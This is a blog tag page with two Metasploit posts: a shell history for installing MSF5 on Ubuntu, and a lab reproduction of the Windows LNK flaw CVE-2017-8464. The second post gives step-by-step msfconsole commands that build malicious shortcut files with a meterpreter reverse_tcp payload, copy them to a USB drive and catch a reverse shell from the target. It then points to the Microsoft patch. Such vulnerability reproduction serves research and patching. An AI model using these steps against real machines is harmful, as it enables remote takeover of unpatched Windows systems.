Tag:metasploit

Posts tagged "metasploit":

Installing MSF5 on Ubuntu 14 or 16.04

Updated 2020-07-19: installing msf5 on Ubuntu 16.04.

Notes:
1. Use a non-root sudo user where possible; otherwise the dependencies installed with bundler install as root may not be usable by the non-root user.
2. Exit the ssh session before running msfconsole for the first time (or run msfconsole inside the msf directory); otherwise it may report missing dependencies and require installing 166 gems with gem install…

Shell history of the install (history line numbers removed):

apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev zlib1g-dev
apt-get install software-properties-common python-software-properties
add-apt-repository ppa:openjdk-r/ppa
apt-get update
apt-get install openjdk-7-jdk
git clone git://github.com/sstephenson/rbenv.git .rbenv
cd
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
source .bashrc
apt-get install nmap
apt-get install openssl ruby-openssl libssl-dev
apt-get install openssl libssl-dev
su postgres
createuser msf -P -S -R -D
cd
createdb -O msf msf
exit
cd /opt
ls
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
ls
curl -L get.rvm.io | bash -s stable
ls
cd
gpg --keyserver hkp://pool.sks-keyservers.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB
curl -L get.rvm.io | bash -s stable
rvm -v
…

Stuxnet repeat (CVE-2017-8464)

0x01 Overview
In June 2017, Microsoft released a patch for CVE-2017-8464. This bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut, aka "LNK Remote Code Execution Vulnerability". It is like Stuxnet, so some people call it the third generation of Stuxnet. In this article, I will reproduce CVE-2017-8464.

0x02 Affected versions
Windows 7 SP1
Windows 8
Windows 8.1
Windows RT 8.1
Windows 10 Gold, 1511, 1607, 1703
Windows Server 2008 SP2 and R2 SP1
Windows Server 2012 Gold and R2
Windows Server 2016

0x03 Trigger conditions
1. AutoPlay is enabled (It worked!)
2. The directory is browsed (It worked!)
3. The file directory is accessed through a network share (I did not test this)

0x04 Bug reproduction
Environment:
Target: Win7 (32-bit)
Attacker: Kali
Tools: MSF, USB drive

Step 1: Download the latest Metasploit, then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat, and copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits.

Step 2:
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your ip
exploit

Step 3 (the generated files are a directory, so cp needs -r):
cp -r /root/.msf4/local/ /root/cve-2017-8464-lnk

Step 4: Copy all 24 files to the root folder of the target USB drive.

Step 5:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your ip
run

Step 6: Insert the USB drive into the target computer, and you will get a reverse shell.

PS: the .cpl file must be in the root folder of the target USB drive!

0x05 Fix
Get the patch from MS: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464

0x06 Conclusion
I think this bug is so cool; it is like Stuxnet, powerful and easy to use, so get the patch as fast as possible.